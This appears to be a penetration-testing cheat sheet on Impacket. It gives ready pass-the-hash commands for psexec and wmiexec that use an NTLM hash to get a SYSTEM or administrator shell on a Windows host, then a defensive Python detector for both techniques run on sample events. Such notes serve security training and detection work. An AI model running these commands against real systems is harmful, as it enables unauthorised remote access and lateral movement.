Impacket

Pass-the-Hash

psexec uploads a service executable to a writable share, registers it as a service, and starts it, so it requires write access to a share. If no command is given at the end of the line, it runs cmd.exe by default, giving a SYSTEM shell.

# SYSTEM shell
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212

# RCE
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212 <command>

wmiexec uses Windows Management Instrumentation (WMI) to execute commands remotely without uploading files or writing to shares, which makes it quieter and faster than psexec. If no command is given at the end of the line, it runs cmd.exe by default, giving a shell as the authenticating user rather than SYSTEM.

# Administrator shell
$ impacket-wmiexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212
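A defender-side counterpart to the two techniques above, added here as an example and not part of the original notes or of Impacket itself: a small Python detector run over constructed sample events. It assumes telemetry shaped like Windows System event 7045 (service installed) and Sysmon event 1 (process creation); the "service binary at a share root" path heuristic and the WmiPrvSE.exe parent check are assumptions about typical artefacts of these behaviours, not something the page states.

```python
import re

# Constructed sample telemetry (not real logs). Field names loosely follow
# Windows System event 7045 (service installed) and Sysmon event 1 (process create).
EVENTS = [
    {"id": 7045, "host": "WS01", "service": "XyQw",
     "image_path": r"%SystemRoot%\aBcDeFgH.exe"},
    {"id": 7045, "host": "WS01", "service": "VendorAgent",
     "image_path": r"C:\Program Files\Vendor\agent.exe"},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "cmd.exe /Q /c whoami"},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe"},
]

# Heuristic assumption: a service binary dropped directly at the root of the Windows
# directory (the ADMIN$ share) or referenced by UNC path is suspicious, because
# legitimate services normally live in subdirectories such as System32 or Program Files.
SHARE_ROOT_BINARY = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows|\\\\[^\\]+\\(?:ADMIN|C)\$)\\[^\\]+\.exe$", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}


def service_from_share(ev):
    """psexec-style: a new service whose binary sits directly in a writable share root."""
    return ev.get("id") == 7045 and bool(SHARE_ROOT_BINARY.match(ev.get("image_path", "")))


def shell_from_wmi(ev):
    """wmiexec-style: a command shell spawned by the WMI provider host (WmiPrvSE.exe)."""
    parent = ev.get("parent_image", "").lower()
    child = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    return ev.get("id") == 1 and parent.endswith("\\wbem\\wmiprvse.exe") and child in SHELLS


def detect(events):
    """Return (rule_name, event) pairs for every event that matches a rule."""
    rules = {"service_from_share": service_from_share, "shell_from_wmi": shell_from_wmi}
    return [(name, ev) for ev in events for name, rule in rules.items() if rule(ev)]


if __name__ == "__main__":
    for name, ev in detect(EVENTS):
        print(f"[{name}] host={ev['host']} {ev}")
```

Both rules are starting points to tune against a baseline of the environment's own service installs and WMI-driven automation.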

AS-REPRoasting

See how to use impacket-GetNPUsers here.

Kerberoasting

See how to use impacket-GetUserSPNs here.

NTLM Relay

See how to use impacket-ntlmrelayx here.

Local SAM Dump

See how to use impacket-secretsdump here.
